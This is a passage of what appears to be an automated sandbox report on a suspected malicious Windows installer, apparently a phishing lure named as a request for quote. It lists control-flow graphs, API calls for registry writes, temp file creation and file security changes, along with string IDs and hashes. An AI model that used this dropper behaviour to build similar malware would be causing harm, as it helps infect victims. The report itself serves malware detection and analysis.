                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 900638850-60021622
                                                                    • Opcode ID: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                                                    • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                                    • Opcode Fuzzy Hash: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                                                    • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies,?,?,00000031), ref: 004017CD
                                                                      • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                      • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00403160), ref: 004051D4
                                                                      • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll), ref: 004051E6
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp$C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies$Call
                                                                    • API String ID: 1941528284-3427630982
                                                                    • Opcode ID: 98617149d2a197177459ef23d6ac5abc8cc87d3de3c007345ed02b250cccfea8
                                                                    • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                                    • Opcode Fuzzy Hash: 98617149d2a197177459ef23d6ac5abc8cc87d3de3c007345ed02b250cccfea8
                                                                    • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 625 405179-40518e 626 405194-4051a5 625->626 627 405245-405249 625->627 628 4051b0-4051bc lstrlenW 626->628 629 4051a7-4051ab call 40603c 626->629 631 4051d9-4051dd 628->631 632 4051be-4051ce lstrlenW 628->632 629->628 634 4051ec-4051f0 631->634 635 4051df-4051e6 SetWindowTextW 631->635 632->627 633 4051d0-4051d4 lstrcatW 632->633 633->631 636 4051f2-405234 SendMessageW * 3 634->636 637 405236-405238 634->637 635->634 636->637 637->627 638 40523a-40523d 637->638 638->627
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                    • lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00403160), ref: 004051D4
                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll), ref: 004051E6
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll$`7~v0}
                                                                    • API String ID: 2531174081-3884843338
                                                                    • Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                                    • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                                    • Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                                    • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 639 405648-405693 CreateDirectoryW 640 405695-405697 639->640 641 405699-4056a6 GetLastError 639->641 642 4056c0-4056c2 640->642 641->642 643 4056a8-4056bc SetFileSecurityW 641->643 643->640 644 4056be GetLastError 643->644 644->642
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                    • GetLastError.KERNEL32 ref: 0040569F
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                                    • GetLastError.KERNEL32 ref: 004056BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                                    • API String ID: 3449924974-2404651315
                                                                    • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                    • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                                    • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                    • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 645 4025e5-4025fa call 402ba2 648 402600-402607 645->648 649 402a4c-402a4f 645->649 651 402609 648->651 652 40260c-40260f 648->652 650 402a55-402a5b 649->650 651->652 654 402773-40277b 652->654 655 402615-402624 call 405f7a 652->655 654->649 655->654 658 40262a 655->658 659 402630-402634 658->659 660 4026c9-4026cc 659->660 661 40263a-402655 ReadFile 659->661 663 4026e4-4026f4 call 405c72 660->663 664 4026ce-4026d1 660->664 661->654 662 40265b-402660 661->662 662->654 666 402666-402674 662->666 663->654 672 4026f6 663->672 664->663 667 4026d3-4026de call 405cd0 664->667 669 40267a-40268c MultiByteToWideChar 666->669 670 40272f-40273b call 405f61 666->670 667->654 667->663 669->672 673 40268e-402691 669->673 670->650 676 4026f9-4026fc 672->676 677 402693-40269e 673->677 676->670 679 4026fe-402703 676->679 677->676 680 4026a0-4026c5 SetFilePointer MultiByteToWideChar 677->680 681 402740-402744 679->681 682 402705-40270a 679->682 680->677 683 4026c7 680->683 685 402761-40276d SetFilePointer 681->685 686 402746-40274a 681->686 682->681 684 40270c-40271f 682->684 683->672 684->654 687 402721-402727 684->687 685->654 688 402752-40275f 686->688 689 40274c-402750 686->689 687->659 690 40272d 687->690 688->654 689->685 689->688 690->654
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                      • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CE6
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                    • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                                    • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                    • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 691 406384-4063a4 GetSystemDirectoryW 692 4063a6 691->692 693 4063a8-4063aa 691->693 692->693 694 4063bb-4063bd 693->694 695 4063ac-4063b5 693->695 697 4063be-4063f1 wsprintfW LoadLibraryExW 694->697 695->694 696 4063b7-4063b9 695->696 696->697
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                    • wsprintfW.USER32 ref: 004063D6
                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                    • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                                    • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                    • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 698 403027-40303e 699 403040 698->699 700 403047-40304f 698->700 699->700 701 403051 700->701 702 403056-40305b 700->702 701->702 703 40306b-403078 call 40320c 702->703 704 40305d-403066 call 403222 702->704 708 4031c3 703->708 709 40307e-403082 703->709 704->703 712 4031c5-4031c6 708->712 710 403088-4030a8 GetTickCount call 406513 709->710 711 4031ac-4031ae 709->711 724 403202 710->724 726 4030ae-4030b6 710->726 714 4031b0-4031b3 711->714 715 4031f7-4031fb 711->715 713 403205-403209 712->713 717 4031b5 714->717 718 4031b8-4031c1 call 40320c 714->718 719 4031c8-4031ce 715->719 720 4031fd 715->720 717->718 718->708 732 4031ff 718->732 722 4031d0 719->722 723 4031d3-4031e1 call 40320c 719->723 720->724 722->723 723->708 735 4031e3-4031ef call 405ca1 723->735 724->713 729 4030b8 726->729 730 4030bb-4030c9 call 40320c 726->730 729->730 730->708 736 4030cf-4030d8 730->736 732->724 741 4031f1-4031f4 735->741 742 4031a8-4031aa 735->742 738 4030de-4030fb call 406533 736->738 744 403101-403118 GetTickCount 738->744 745 4031a4-4031a6 738->745 741->715 742->712 746 403163-403165 744->746 747 40311a-403122 744->747 745->712 750 403167-40316b 746->750 751 403198-40319c 746->751 748 403124-403128 747->748 749 40312a-40315b MulDiv wsprintfW call 405179 747->749 748->746 748->749 757 403160 749->757 754 403180-403186 750->754 755 40316d-403172 call 405ca1 750->755 751->726 752 4031a2 751->752 752->724 756 40318c-403190 754->756 760 403177-403179 755->760 756->738 759 403196 756->759 757->746 759->724 760->742 761 40317b-40317e 760->761 761->756
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                    • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                                    • Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                    • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 762 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 769 4023c7-4023cf 762->769 770 402a4c-402a5b 762->770 772 4023d1-4023de call 402bbf lstrlenW 769->772 773 4023e2-4023e5 769->773 772->773 776 4023f5-4023f8 773->776 777 4023e7-4023f4 call 402ba2 773->777 780 402409-40241d RegSetValueExW 776->780 781 4023fa-402404 call 403027 776->781 777->776 784 402422-4024fc RegCloseKey 780->784 785 40241f 780->785 781->780 784->770 787 40281e-402825 784->787 785->784 787->770
                                                                    APIs
                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateValuelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp
                                                                    • API String ID: 1356686001-2220402086
                                                                    • Opcode ID: 9c3560047bf81b060649ab2ba7fae034fea2e254797de55e48abe939b4ee199e
                                                                    • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                                    • Opcode Fuzzy Hash: 9c3560047bf81b060649ab2ba7fae034fea2e254797de55e48abe939b4ee199e
                                                                    • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 788 405c1e-405c2a 789 405c2b-405c5f GetTickCount GetTempFileNameW 788->789 790 405c61-405c63 789->790 791 405c6e-405c70 789->791 790->789 793 405c65 790->793 792 405c68-405c6b 791->792 793->792
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405C3C
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                                    Strings
                                                                    • "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe", xrefs: 00405C1E
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                                    • nsa, xrefs: 00405C2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
